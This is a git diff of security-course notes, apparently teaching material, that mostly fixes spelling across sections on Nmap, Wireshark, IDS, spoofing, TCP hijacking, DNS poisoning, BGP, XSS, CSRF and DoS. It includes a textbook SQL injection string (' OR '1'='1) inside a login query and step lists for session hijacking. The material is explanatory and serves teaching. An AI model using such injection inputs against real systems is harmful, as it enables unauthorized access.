- Bastion hosts are computers with strong defence mechanisms. They often serve as host computers for implementing application gateways, circuit gateways, and other types of firewalls. A bastion host is operated on a trusted operating system that must not contain unnecessary functionalities or programs. This measure helps to reduce error probabilities and makes it easier to conduct security checks. Only those network application programs that are necessary, for example, SSH, DNS, SMTP, and authentication programs, are installed on a bastion host.
- Bastion hosts are also primarily used as controlled ingress points so that the security monitoring can focus more narrowly on actions happening at a single point closely.
---
@ -137,8 +137,8 @@ Let us see how we keep a check on the perimeter i.e the edges, the first layer o
### Scanning Ports with Nmap
- Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
- The best thing about Nmap is its free and open source and is very flexible and versatile
- Nmap ("Network Mapper") is a free and open-source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
- The best thing about Nmap is its free and open-source and is very flexible and versatile
- Nmap is often used to determine alive hosts in a network, open ports on those hosts, services running on those open ports, and version identification of that service on that port.
- More at http://scanme.nmap.org/
@ -152,7 +152,7 @@ Nmap uses 6 different port states:
- **Open** — An open port is one that is actively accepting TCP, UDP or SCTP connections. Open ports are what interests us the most because they are the ones that are vulnerable to attacks. Open ports also show the available services on a network.
- **Closed** — A port that receives and responds to Nmap probe packets but there is no application listening on that port. Useful for identifying that the host exists and for OS detection.
- **Filtered** — Nmap cant determine whether the port is open because packet filtering prevents its probes from reaching the port. Filtering could come from firewalls or router rules. Often little information is given from filtered ports during scans as the filters can drop the probes without responding or respond with useless error messages e.g. destination unreachable.
- **Unfiltered** — Port is accessible but Nmap doesnt know if its open or closed. Only used in ACK scan which is used to map firewall rulesets. Other scan types can be used to identify whether the port is open.
- **Unfiltered** — Port is accessible but Nmap doesnt know if it is open or closed. Only used in ACK scan which is used to map firewall rulesets. Other scan types can be used to identify whether the port is open.
- **Open/filtered** — Nmap is unable to determine between open and filtered. This happens when an open port gives no response. No response could mean that the probe was dropped by a packet filter or any response is blocked.
- **Closed/filtered** — Nmap is unable to determine whether a port is closed or filtered. Only used in the IP ID idle scan.
@ -162,8 +162,8 @@ Nmap uses 6 different port states:
- TCP Connect scan completes the 3-way handshake.
- If a port is open, the operating system completes the TCP three-way handshake and the port scanner immediately closes the connection to avoid DOS. This is “noisy” because the services can log the sender IP address and might trigger Intrusion Detection Systems.
2. UDP Scan
- This scan checks to see if there are any UDP ports listening.
- Since UDP does not respond with a positive acknowledgment like TCP and only responds to an incoming UDP packet when the port is closed,
- This scan checks to see if any UDP ports are listening.
- Since UDP does not respond with a positive acknowledgement like TCP and only responds to an incoming UDP packet when the port is closed,
3. SYN Scan
- SYN scan is another form of TCP scanning.
@ -186,7 +186,7 @@ Nmap uses 6 different port states:
- This special type of scan looks for machine answering to RPC (Remote Procedure Call) services
9. IDLE Scan
- It is a super stealthy method whereby the scan packets are bounced off an external host.
- You dont need to have control over the other host but it does have to set up and meet certain requirements. You must input the IP address of our “zombie” host and what port number to use. It is one of the more controversial options in Nmap since it really only has a use for malicious attacks.
- You dont need to have control over the other host but it does have to set up and meet certain requirements. You must input the IP address of our “zombie” host and what port number to use. It is one of the more controversial options in Nmap since it only has a use for malicious attacks.
Scan Techniques
@ -200,7 +200,7 @@ A couple of scan techniques which can be used to gain more information about a s
- OpenVAS is made up of three main parts. These are:
- a regularly updated feed of Network Vulnerability Tests (NVTs);
- a scanner, which runs the NVTs; and
- a SQLite 3 database for storing both your test configurations and the NVTs results and configurations.
- an SQLite 3 database for storing both your test configurations and the NVTs results and configurations.
- <https://www.greenbone.net/en/install_use_gce/>
### WireShark
@ -209,7 +209,7 @@ A couple of scan techniques which can be used to gain more information about a s
- This means Wireshark is designed to decode not only packet bits and bytes but also the relations between packets and protocols.
- Wireshark understands protocol sequences.
A simple demo of wireshark
A simple demo of Wireshark
1. Capture only udp packets:
- Capture filter = “udp”
@ -286,8 +286,8 @@ A simple demo of wireshark
- Dumpcap is a network traffic dump tool. It captures packet data from a live network and writes the packets to a file. Dumpcaps native capture file format is pcapng, which is also the format used by Wireshark.
- By default, Dumpcap uses the pcap library to capture traffic from the first available network interface and writes the received raw packet data, along with the packets time stamps into a pcapng file. The capture filter syntax follows the rules of the pcap library.
- The Wireshark command line utility called 'dumpcap.exe' can be used to capture LAN traffic over an extended period of time.
- Wireshark itself can also be used, but dumpcap does not significantly utilize the computer's memory while capturing for long periods of time.
- The Wireshark command-line utility called 'dumpcap.exe' can be used to capture LAN traffic over an extended period of time.
- Wireshark itself can also be used, but dumpcap does not significantly utilize the computer's memory while capturing for long periods.
### DaemonLogger
@ -301,7 +301,7 @@ A simple demo of wireshark
- Netsniff-NG is a high-performance packet capture utility
- While the utilities weve discussed to this point rely on Libpcap for capture, Netsniff-NG utilizes zero-copy mechanisms to capture packets. This is done with the intent to support full packet capture over high throughput links.
- In order to begin capturing packets with Netsniff-NG, we have to specify an input and output. In most cases, the input will be a network interface, and the output will be a file or folder on disk.
- To begin capturing packets with Netsniff-NG, we have to specify an input and output. In most cases, the input will be a network interface, and the output will be a file or folder on disk.
`netsniff-ng i eth1 o data.pcap`
@ -317,7 +317,7 @@ A simple demo of wireshark
### IDS
A security solution that detects security-related events in your environment but does not block them.
IDS sensors can be software and hardware based used to collect and analyze the network traffic. These sensors are available in two varieties, network IDS and host IDS.
IDS sensors can be software and hardware-based used to collect and analyze the network traffic. These sensors are available in two varieties, network IDS and host IDS.
- A host IDS is a server-specific agent running on a server with a minimum of overhead to monitor the operating system.
- A network IDS can be embedded in a networking device, a standalone appliance, or a module monitoring the network traffic.
@ -332,7 +332,7 @@ Signature Based IDS
- ex: SNORT & SURICATA
Policy Based IDS
Policy-Based IDS
- The policy-based IDSs (mainly host IDSs) trigger an alarm whenever a violation occurs against the configured policy.
- This configured policy is or should be a representation of the security policies.
@ -347,7 +347,7 @@ Anomaly Based IDS
- Statistical anomaly detection learns the traffic patterns interactively over a period of time.
- In the nonstatistical approach, the IDS has a predefined configuration of the supposedly acceptable and valid traffic patterns.
Host Based IDS & Network Based IDS
Host-Based IDS & Network-Based IDS
- A host IDS can be described as a distributed agent residing on each server of the network that needs protection. These distributed agents are tied very closely to the underlying operating system.
@ -355,7 +355,7 @@ Host Based IDS & Network Based IDS
Honeypots
- The use of decoy machines to direct intruders' attention away from the machines under protection is a major technique to preclude intrusion attacks. Any device, system, directory, or file used as a decoy to lure attackers away from important assets and to collect intrusion or abusive behaviors is referred to as a honeypot.
- The use of decoy machines to direct intruders' attention away from the machines under protection is a major technique to preclude intrusion attacks. Any device, system, directory, or file used as a decoy to lure attackers away from important assets and to collect intrusion or abusive behaviours is referred to as a honeypot.
- A honeypot may be implemented as a physical device or as an emulation system. The idea is to set up decoy machines in a LAN, or decoy directories/files in a file system and make them appear important, but with several exploitable loopholes, to lure attackers to attack these machines or directories/files, so that other machines, directories, and files can evade intruders' attentions. A decoy machine may be a host computer or a server computer. Likewise, we may also set up decoy routers or even decoy LANs.
---
@ -373,30 +373,30 @@ Honeypots
IP Spoofing Detection Techniques
- Direct TTL Probes
- In this technique we send a packet to a host of suspect spoofed IP that triggers reply and compare TTL with suspect packet; if the TTL in the reply is not the same as the packet being checked; it is a spoofed packet.
- In this technique we send a packet to a host of suspect spoofed IP that triggers reply and compares TTL with suspect packet; if the TTL in the reply is not the same as the packet being checked; it is a spoofed packet.
- This Technique is successful when the attacker is in a different subnet from the victim.
![image19](images/image19.png)
- IP Identification Number.
- Send a probe to the host of suspect spoofed traffic that triggers a reply and compare IP ID with suspect traffic.
- Send a probe to the host of suspect spoofed traffic that triggers a reply and compares IP ID with suspect traffic.
- If IP IDs are not in the near value of packet being checked, suspect traffic is spoofed
- TCP Flow Control Method
- Attackers sending spoofed TCP packets will not receive the targets SYN-ACK packets.
- Attackers cannot therefore be responsive to change in the congestion window size
- Attackers cannot, therefore, be responsive to change in the congestion window size
- When the receiver still receives traffic even after a windows size is exhausted, most probably the packets are spoofed.
### Covert Channel
- A covert or clandestine channel can be best described as a pipe or communication channel between two entities that can be exploited by a process or application transferring information in a manner that violates the system's security specifications.
- More specifically for TCP/IP, in some instances, covert channels are established, and data can be secretly passed between two end systems.
- Ex: ICMP resides at the Internet layer of the TCP/IP protocol suite and is implemented in all TCP/IP hosts. Based on the specifications of the ICMP Protocol, an ICMP Echo Request message should have an 8-byte header and a 56-byte payload. The ICMP Echo Request packet should not carry any data in the payload. However, these packets are often used to carry secret information. The ICMP packets are altered slightly to carry secret data in the payload. This makes the size of the packet larger, but no control exists in the protocol stack to defeat this behavior. The alteration of ICMP packets gives intruders the opportunity to program specialized client-server pairs. These small pieces of code export confidential information without alerting the network administrator.
- Ex: ICMP resides at the Internet layer of the TCP/IP protocol suite and is implemented in all TCP/IP hosts. Based on the specifications of the ICMP Protocol, an ICMP Echo Request message should have an 8-byte header and a 56-byte payload. The ICMP Echo Request packet should not carry any data in the payload. However, these packets are often used to carry secret information. The ICMP packets are altered slightly to carry secret data in the payload. This makes the size of the packet larger, but no control exists in the protocol stack to defeat this behaviour. The alteration of ICMP packets allows intruders to program specialized client-server pairs. These small pieces of code export confidential information without alerting the network administrator.
- ICMP can be leveraged for more than data exfiltration. For eg. some C&C tools such as Loki used ICMP channel to establish encrypted interactive session back in 1996.
- Deep packet inspection has since come a long way. A lot of IDS/IPS detect ICMP tunneling.
- Deep packet inspection has since come a long way. A lot of IDS/IPS detect ICMP tunnelling.
- Check for echo responses that do not contain the same payload as request
- Check for volume of ICMP traffic specially for volumes beyond an acceptable threshold
- Check for the volume of ICMP traffic especially for volumes beyond an acceptable threshold
### IP Fragmentation Attack
@ -410,9 +410,9 @@ IP Spoofing Detection Techniques
TCP Flags
- Data exchange using TCP does not happen until a three-way handshake has been successfully completed. This handshake uses different flags to influence the way TCP segments are processed.
- Data exchange using TCP does not happen until a three-way handshake has been completed. This handshake uses different flags to influence the way TCP segments are processed.
- There are 6 bits in the TCP header that are often called flags. Namely:
- 6 different flags are part of the TCP header: Urgent pointer field (URG), Acknowledgment field (ACK), Push function (PSH), Reset the connection (RST), Synchronize sequence numbers (SYN), and sender is finished with this connection (FIN).
- 6 different flags are part of the TCP header: Urgent pointer field (URG), Acknowledgment field (ACK), Push function (PSH), Reset the connection (RST), Synchronize sequence numbers (SYN), and the sender is finished with this connection (FIN).
![image20](images/image20.png)
- Abuse of the normal operation or settings of these flags can be used by attackers to launch DoS attacks. This causes network servers or web servers to crash or hang.
@ -426,14 +426,14 @@ TCP Flags
| 1 |1 |1 |1 |Illegal Combination
```
- The attacker's ultimate goal is to write special programs or pieces of code that are able to construct these illegal combinations resulting in an efficient DoS attack.
- The attacker's ultimate goal is to write special programs or pieces of code that can construct these illegal combinations resulting in an efficient DoS attack.
SYN FLOOD
- The timers (or lack of certain timers) in 3 way handshake are often used and exploited by attackers to disable services or even to enter systems.
- After step 2 of the three-way handshake, no limit is set on the time to wait after receiving a SYN. The attacker initiates many connection requests to the web server of Company XYZ (almost certainly with a spoofed IP address).
- The SYN+ACK packets (Step 2) sent by the web server back to the originating source IP address are not replied to. This leaves a TCP session half-open on the web server. Multiple packets cause multiple TCP sessions to stay open.
- Based on the hardware limitations of the server, a limited number of TCP sessions can stay open, and as a result, the web server refuses further connection establishments attempts from any host as soon as a certain limit is reached. These half-open connections need to be completed or timed out before new connections can be established.
- After step 2 of the three-way handshake, no limit is set on the time to wait after receiving a SYN. The attacker initiates many connection requests to the webserver of Company XYZ (almost certainly with a spoofed IP address).
- The SYN+ACK packets (Step 2) sent by the web server back to the originating source IP address are not replied to. This leaves a TCP session half-open on the webserver. Multiple packets cause multiple TCP sessions to stay open.
- Based on the hardware limitations of the server, a limited number of TCP sessions can stay open, and as a result, the webserver refuses further connection establishments attempts from any host as soon as a certain limit is reached. These half-open connections need to be completed or timed out before new connections can be established.
FIN Attack
@ -446,9 +446,9 @@ FIN Attack
![image22](images/image22.png)
- An authorized user (Employee X) sends HTTP requests over a TCP session with the web server.
- The web server accepts the packets from Employee X only when the packet has the correct SEQ/ACK numbers. As seen previously, these numbers are important for the web server to distinguish between different sessions and to make sure it is still talking to Employee X. Imagine that the cracker starts sending packets to the web server spoofing the IP address of Employee X, using the correct SEQ/ACK combination. The web server accepts the packet and increments the ACK number.
- In the meantime, Employee X continues to send packets but with incorrect SEQ/ACK numbers. As a result of sending unsynchronized packets, all data from Employee X is discarded when received by the web server. The attacker pretends to be Employee X using the correct numbers. This finally results in the cracker hijacking the connection, whereby Employee X is completely confused and the web server replies assuming the cracker is sending correct synchronized data.
- An authorized user (Employee X) sends HTTP requests over a TCP session with the webserver.
- The web server accepts the packets from Employee X only when the packet has the correct SEQ/ACK numbers. As seen previously, these numbers are important for the webserver to distinguish between different sessions and to make sure it is still talking to Employee X. Imagine that the cracker starts sending packets to the web server spoofing the IP address of Employee X, using the correct SEQ/ACK combination. The web server accepts the packet and increments the ACK number.
- In the meantime, Employee X continues to send packets but with incorrect SEQ/ACK numbers. As a result of sending unsynchronized packets, all data from Employee X is discarded when received by the webserver. The attacker pretends to be Employee X using the correct numbers. This finally results in the cracker hijacking the connection, whereby Employee X is completely confused and the webserver replies assuming the cracker is sending correct synchronized data.
STEPS:
@ -457,7 +457,7 @@ STEPS:
3. Employee X acknowledges the packet.
4. The cracker launches a spoofed packet to the server.
5. The web server responds to the cracker. The cracker starts verifying SEQ/ACK numbers to double-check success. At this time, the cracker takes over the session from Employee X, which results in a session hanging for Employee X.
6. The cracker can start sending traffic to the web server.
6. The cracker can start sending traffic to the webserver.
7. The web server returns the requested data to confirm delivery with the correct ACK number.
8. The cracker can continue to send data (keeping track of the correct SEQ/ACK numbers) until eventually setting the FIN flag to terminate the session.
@ -465,7 +465,7 @@ STEPS:
- A buffer is a temporary data storage area used to store program code and data.
- When a program or process tries to store more data in a buffer than it was originally anticipated to hold, a buffer overflow occurs.
- Buffers are temporary storage locations in memory (memory or buffer sizes are often measured in bytes) that are able to store a fixed amount of data in bytes. When more data is retrieved than can be stored in a buffer location, the additional information must go into an adjacent buffer, resulting in overwriting the valid data held in them.
- Buffers are temporary storage locations in memory (memory or buffer sizes are often measured in bytes) that can store a fixed amount of data in bytes. When more data is retrieved than can be stored in a buffer location, the additional information must go into an adjacent buffer, resulting in overwriting the valid data held in them.
Mechanism:
@ -477,7 +477,7 @@ Mechanism:
CounterMeasure:
- The most important approach is to have a concerted focus on writing correct code.
- A second method is to make the data buffers (memory locations) address space of the program code non executable. This type of address space makes it impossible to execute code, which might be infiltrated in the program's buffers during an attack.
- A second method is to make the data buffers (memory locations) address space of the program code non-executable. This type of address space makes it impossible to execute code, which might be infiltrated in the program's buffers during an attack.
### More Spoofing

View File

@ -5,22 +5,22 @@
### Cache Poisoning Attack
- Since DNS responses are cached, a quick response can be provided for repeated translations.
DNS negative queries are also cached, e.g., misspelled words, and all cached data periodically times out.
DNS negative queries are also cached, e.g., misspelt words, and all cached data periodically times out.
Cache poisoning is an issue in what is known as pharming. This term is used to describe a hackers attack in which a websites traffic is redirected to a bogus website by forging the DNS mapping. In this case, an attacker attempts to insert a fake address record for an Internet domain into the DNS.
If the server accepts the fake record, the cache is poisoned and subsequent requests for the address of the domain are answered with the address of a server controlled by the attacker. As long as the fake entry is cached by the server, browsers or e-mail servers will automatically go to the address provided by the compromised DNS server.
the typical time to live (TTL) for cached entries is a couple of hours, thereby permitting ample time for numerous users to be affected by the attack.
### DNSSEC (Security Extension)
- The long-term solution to these DNS problems is authentication. If a resolver cannot distinguish between valid and invalid data in a response, then add source authentication to verify that the data received in a response is equal to the data entered by the zone administrator
- DNS Security Extensions (DNSSEC) protects against data spoofing and corruption, and provides mechanisms to authenticate servers and requests, as well as mechanisms to establish authenticity and integrity.
- The long-term solution to these DNS problems is authentication. If a resolver cannot distinguish between valid and invalid data in a response, then add source authentication to verify that the data received in response is equal to the data entered by the zone administrator
- DNS Security Extensions (DNSSEC) protects against data spoofing and corruption and provides mechanisms to authenticate servers and requests, as well as mechanisms to establish authenticity and integrity.
- When authenticating DNS responses, each DNS zone signs its data using a private key. It is recommended that this signing be done offline and in advance. The query for a particular record returns the requested resource record set (RRset) and signature (RRSIG) of the requested resource record set. The resolver then authenticates the response using a public key, which is pre-configured or learned via a sequence of key records in the DNS hierarchy.
- The goals of DNSSEC are to provide authentication and integrity for DNS responses without confidentiality or DDoS protection.
### BGP
- BGP stands for border gateway protocol. It is a routing protocol that exchanges routing information among multiple Autonomous Systems (AS)
- An Autonomous system is a collection of routers or networks with the same network policy usually under a single administrative control.
- An Autonomous System is a collection of routers or networks with the same network policy usually under single administrative control.
- BGP tells routers which hop to use in order to reach the destination network.
- BGP is used for both communicating information among routers in an AS (interior) and between multiple ASes (exterior).
@ -29,11 +29,11 @@ the typical time to live (TTL) for cached entries is a couple of hours, thereby
## How BGP Works
- BGP is responsible for finding a path to a destination router & the path it chooses should be the shortest and most reliable one.
- This decision is done through a protocol known as Link state. With the link state protocol each router broadcasts to all other routers in the network the state of its links and IP subnets. Each router then receives information from the other routers and constructs a complete topology view of the entire network. The next hop routing table is based on this topology view.
- The link state protocol uses a famous algorithm in the field of computer science, Dijkstras shortest path algorithm:
- We start from our router considering the path cost to all our direct neighbors.
- This decision is done through a protocol known as Link state. With the link-state protocol, each router broadcasts to all other routers in the network the state of its links and IP subnets. Each router then receives information from the other routers and constructs a complete topology view of the entire network. The next-hop routing table is based on this topology view.
- The link-state protocol uses a famous algorithm in the field of computer science, Dijkstras shortest path algorithm:
- We start from our router considering the path cost to all our direct neighbours.
- The shortest path is then taken
- We then re-look at all our neighbors that we can reach and update our link state table with the cost information. We then continue taking the shortest path until every router has been visited.
- We then re-look at all our neighbours that we can reach and update our link state table with the cost information. We then continue taking the shortest path until every router has been visited.
## BGP Vulnerabilities
@ -41,34 +41,34 @@ the typical time to live (TTL) for cached entries is a couple of hours, thereby
- Injecting bogus route advertising information into the BGP-distributed routing database by malicious sources, accidentally or routers can disrupt Internet backbone operations.
- Blackholing traffic:
- Blackhole route is a network route, i.e., routing table entry, that goes nowhere and packets matching the route prefix are dropped or ignored. Blackhole routes can only be detected by monitoring the lost traffic.
- Blackhole routes are best defence against many common viral attacks where the traffic is dropped from infected machines to/from command & control masters.
- Blackhole routes are the best defence against many common viral attacks where the traffic is dropped from infected machines to/from command & control masters.
- Infamous BGP Injection attack on Youtube
- EX: In 2008, Pakistan decided to block YouTube by creating a BGP route that led into a black hole. Instead this routing information got transmitted to a hong kong ISP and from there accidentally got propagated to the rest of the world meaning millions were routed through to this black hole and therefore unable to access YouTube.
- EX: In 2008, Pakistan decided to block YouTube by creating a BGP route that led into a black hole. Instead, this routing information got transmitted to a hong kong ISP and from there accidentally got propagated to the rest of the world meaning millions were routed through to this black hole and therefore unable to access YouTube.
- Potentially, the greatest risk to BGP occurs in a denial of service attack in which a router is flooded with more packets than it can handle. Network overload and router resource exhaustion happen when the network begins carrying an excessive number of BGP messages, overloading the router control processors, memory, routing table and reducing the bandwidth available for data traffic.
- Refer : <https://medium.com/bugbountywriteup/bgp-the-weak-link-in-the-internet-what-is-bgp-and-how-do-hackers-exploit-it-d899a68ba5bb>
- Router flapping is another type of attack. Route flapping refers to repetitive changes to the BGP routing table, often several times a minute. Withdrawing and re-advertising at a high-rate can cause a serious problem for routers, since they propagate the announcements of routes. If these route flaps happen fast enough, e.g., 30 to 50 times per second, the router becomes overloaded, which eventually prevents convergence on valid routes. The potential impact for Internet users is a slowdown in message delivery, and in some cases packets may not be delivered at all.
- Refer: <https://medium.com/bugbountywriteup/bgp-the-weak-link-in-the-internet-what-is-bgp-and-how-do-hackers-exploit-it-d899a68ba5bb>
- Router flapping is another type of attack. Route flapping refers to repetitive changes to the BGP routing table, often several times a minute. Withdrawing and re-advertising at a high-rate can cause a serious problem for routers since they propagate the announcements of routes. If these route flaps happen fast enough, e.g., 30 to 50 times per second, the router becomes overloaded, which eventually prevents convergence on valid routes. The potential impact for Internet users is a slowdown in message delivery, and in some cases, packets may not be delivered at all.
BGP Security
- Border Gateway Protocol Security recommends the use of BGP peer authentication, since it is one of the strongest mechanisms for preventing malicious activity.
- Border Gateway Protocol Security recommends the use of BGP peer authentication since it is one of the strongest mechanisms for preventing malicious activity.
- The authentication mechanisms are Internet Protocol Security (IPsec) or BGP MD5.
- Another method, known as prefix limits, can be used to avoid filling router tables. In this approach, routers should be configured to disable or terminate a BGP peering session, and issue warning messages to administrators, when a neighbor sends in excess of a preset number of prefixes.
- Another method, known as prefix limits, can be used to avoid filling router tables. In this approach, routers should be configured to disable or terminate a BGP peering session, and issue warning messages to administrators when a neighbour sends in excess of a preset number of prefixes.
- IETF is currently working on improving this space
## Web Based Attacks
## Web-Based Attacks
### HTTP Response Splitting Attacks
- HTTP response splitting attack may happen where the server script embeds user data in HTTP response headers without appropriate sanitation.
- This typically happens when the script embeds user data in the redirection URL of a redirection response (HTTP status code 3xx), or when the script embeds user data in a cookie value or name when the response sets a cookie.
- HTTP response splitting attacks can be used to perform web cache poisoning and cross-site scripting attacks.
- HTTP response splitting is the attackers ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
- HTTP response splitting is the attackers ability to send a single HTTP request that forces the webserver to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
### Cross-Site Request Forgery (CSRF or XSRF)
- A Cross-Site Request Forgery attack tricks the victims browser into issuing a command to a vulnerable web application.
- Vulnerability is caused by browsers automatically including user authentication data, session ID, IP address, Windows domain credentials, etc with each request.
- Vulnerability is caused by browsers automatically including user authentication data, session ID, IP address, Windows domain credentials, etc. with each request.
- Attackers typically use CSRF to initiate transactions such as transfer funds, login/logout user, close account, access sensitive data, and change account details.
- The vulnerability is caused by web browsers that automatically include credentials with each request, even for requests caused by a form, script, or image on another site. CSRF can also be dynamically constructed as part of a payload for a cross-site scripting attack
- All sites relying on automatic credentials are vulnerable. Popular browsers cannot prevent cross-site request forgery. Logging out of high-value sites as soon as possible can mitigate CSRF risk. It is recommended that a high-value website must require a client to manually provide authentication data in the same HTTP request used to perform any operation with security implications. Limiting the lifetime of session cookies can also reduce the chance of being used by other malicious sites.
@ -77,20 +77,20 @@ BGP Security
### Cross-Site Scripting (XSS) Attacks
- Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the machine of any user that views the site.
- If successful, Cross-Site Scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems.
- If successful, Cross-Site Scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end-user systems.
- Cross-Site Scripting (XSS or CSS) attacks involve the execution of malicious scripts on the victims browser. The victim is simply a users host and not the server. XSS results from a failure to validate user input by a web-based application.
### Document Object Model (DOM) XSS Attacks
- The Document Object Model (DOM) based XSS does not require the web server to receive the XSS payload for a successful attack. The attacker abuses the runtime by embedding their data on the client side. An attacker can force the client (browser) to render the page with parts of the DOM controlled by the attacker.
- When the page is rendered and the data is processed by the page, typically by a client side HTML-embedded script such as JavaScript, the pages code may insecurely embed the data in the page itself, thus delivering the cross-site scripting payload. There are several DOM objects which can serve as an attack vehicle for delivering malicious script to victims browser.
- The Document Object Model (DOM) based XSS does not require the webserver to receive the XSS payload for a successful attack. The attacker abuses the runtime by embedding their data on the client-side. An attacker can force the client (browser) to render the page with parts of the DOM controlled by the attacker.
- When the page is rendered and the data is processed by the page, typically by a client-side HTML-embedded script such as JavaScript, the pages code may insecurely embed the data in the page itself, thus delivering the cross-site scripting payload. There are several DOM objects which can serve as an attack vehicle for delivering malicious script to victims browser.
### Clickjacking
- The technique works by hiding malicious link/scripts under the cover of the content of a legitimate site.
- Buttons on a website actually contain invisible links, placed there by the attacker. So, an individual who clicks on an object they can visually see, is actually being duped into visiting a malicious page or executing a malicious script.
- Buttons on a website actually contain invisible links, placed there by the attacker. So, an individual who clicks on an object they can visually see is actually being duped into visiting a malicious page or executing a malicious script.
- When mouseover is used together with clickjacking, the outcome is devastating. Facebook users have been hit by a clickjacking attack, which tricks people into “liking” a particular Facebook page, thus enabling the attack to spread since Memorial Day 2010.
- There is not yet effective defense against clickjacking, and disabling JavaScript is the only viable method
- There is not yet effective defence against clickjacking, and disabling JavaScript is the only viable method
## DataBase Attacks & Defenses
@ -107,7 +107,7 @@ Here the username & password is the input provided by the user. Suppose an attac
SELECT USERNAME,PASSWORD from USERS where USERNAME='' OR '1'='1' AND PASSOWRD='' OR '1'='1';
This query results in a true statement & user gets logged in. This example depicst the bost basic type of SQL injection
This query results in a true statement & the user gets logged in. This example depicts the bost basic type of SQL injection
```
@ -130,13 +130,13 @@ In spite of the most aggressive steps to protect computers from attacks, attacke
### Denial of Service Attacks
- Denial of service (DoS) attacks result in downtime or inability of a user to access a system. DoS attacks impact the availability tenet of information systems security. A DoS attack is a coordinated attempt to deny service by occupying a computer to perform large amounts of unnecessary tasks. This excessive activity makes the system unavailable to perform legitimate operations
- Denial of service (DoS) attacks result in downtime or inability of a user to access a system. DoS attacks impact the availability of tenet of information systems security. A DoS attack is a coordinated attempt to deny service by occupying a computer to perform large amounts of unnecessary tasks. This excessive activity makes the system unavailable to perform legitimate operations
- Two common types of DoS attacks are as follows:
- Logic attacks—Logic attacks use software flaws to crash or seriously hinder the performance of remote servers. You can prevent many of these attacks by installing the latest patches to keep your software up to date.
- Flooding attacks—Flooding attacks overwhelm the victim computers CPU, memory, or network resources by sending large numbers of useless requests to the machine.
- Most DoS attacks target weaknesses in the overall system architecture rather than a software bug or security flaw
- One popular technique for launching a packet flood is a SYN flood.
- One of the best defenses against DoS attacks is to use intrusion prevention system (IPS) software or devices to detect and stop the attack.
- One of the best defences against DoS attacks is to use intrusion prevention system (IPS) software or devices to detect and stop the attack.
### Distributed Denial of Service Attacks
@ -160,14 +160,14 @@ In spite of the most aggressive steps to protect computers from attacks, attacke
### Birthday Attack
- Once an attacker compromises a hashed password file, a birthday attack is performed. A birthday attack is a type of cryptographic attack that is used to make brute-force attack of one-way hashes easier. It is a mathematical exploit that is based on the birthday problem in probability theory.
- Once an attacker compromises a hashed password file, a birthday attack is performed. A birthday attack is a type of cryptographic attack that is used to make a brute-force attack of one-way hashes easier. It is a mathematical exploit that is based on the birthday problem in probability theory.
- Further Reading:
- <https://www.sciencedirect.com/topics/computer-science/birthday-attack>
- <https://www.internetsecurity.tips/birthday-attack/>
### Brute-Force Password Attacks
- In a brute-force password attack, the attacker tries different passwords on a system until one of them is successful. Usually the attacker employs a software program to try all possible combinations of a likely password, user ID, or security code until it locates a match. This occurs rapidly and in sequence. This type of attack is called a brute-force password attack because the attacker simply hammers away at the code. There is no skill or stealth involved—just brute force that eventually breaks the code.
- In a brute-force password attack, the attacker tries different passwords on a system until one of them is successful. Usually, the attacker employs a software program to try all possible combinations of a likely password, user ID, or security code until it locates a match. This occurs rapidly and in sequence. This type of attack is called a brute-force password attack because the attacker simply hammers away at the code. There is no skill or stealth involved—just brute force that eventually breaks the code.
- Further Reading:
- <https://owasp.org/www-community/attacks/Brute_force_attack>
- <https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks>
@ -187,7 +187,7 @@ https://capec.mitre.org/data/definitions/16.html
### Man-in-the-Middle Attacks
- A man-in-the-middle attack takes advantage of the multihop process used by many types of networks. In this type of attack, an attacker intercepts messages between two parties before transferring them on to their intended destination.
- Web spoofing is a type of man-in-the-middle attack in which the user believes a secure session exists with a particular web server. In reality, the secure connection exists only with the attacker, not the web server. The attacker then establishes a secure connection with the web server, acting as an invisible go-between. The attacker passes traffic between the user and the web server. In this way, the attacker can trick the user into supplying passwords, credit card information, and other private data.
- Web spoofing is a type of man-in-the-middle attack in which the user believes a secure session exists with a particular web server. In reality, the secure connection exists only with the attacker, not the webserver. The attacker then establishes a secure connection with the webserver, acting as an invisible go-between. The attacker passes traffic between the user and the webserver. In this way, the attacker can trick the user into supplying passwords, credit card information, and other private data.
- Further Reading:
- <https://owasp.org/www-community/attacks/Man-in-the-middle_attack>
@ -199,7 +199,7 @@ https://capec.mitre.org/data/definitions/16.html
### Eavesdropping
- Eavesdropping, or sniffing, occurs when a host sets its network interface on promiscuous mode and copies packets that pass by for later analysis. Promiscuous mode enables a network device to intercept and read each network packet(ofcourse given some conditions) given sec, even if the packets address doesnt match the network device. It is possible to attach hardware and software to monitor and analyze all packets on that segment of the transmission media without alerting any other users. Candidates for eavesdropping include satellite, wireless, mobile, and other transmission methods.
- Eavesdropping, or sniffing, occurs when a host sets its network interface on promiscuous mode and copies packets that pass by for later analysis. Promiscuous mode enables a network device to intercept and read each network packet(of course given some conditions) given sec, even if the packets address doesnt match the network device. It is possible to attach hardware and software to monitor and analyze all packets on that segment of the transmission media without alerting any other users. Candidates for eavesdropping include satellite, wireless, mobile, and other transmission methods.
### Social Engineering

View File

@ -17,7 +17,7 @@ The first and most important step in reducing security and reliability issues is
Try to keep your code clean and simple.
### Avoid Multi Level Nesting
### Avoid Multi-Level Nesting
- Multilevel nesting is a common anti-pattern that can lead to simple mistakes. If the error is in the most common code path, it will likely be captured by the unit tests. However, unit tests dont always check error handling paths in multilevel nested code. The error might result in decreased reliability (for example, if the service crashes when it mishandles an error) or a security vulnerability (like a mishandled authorization check error).
@ -42,7 +42,7 @@ The first and most important step in reducing security and reliability issues is
### Fuzz Testing
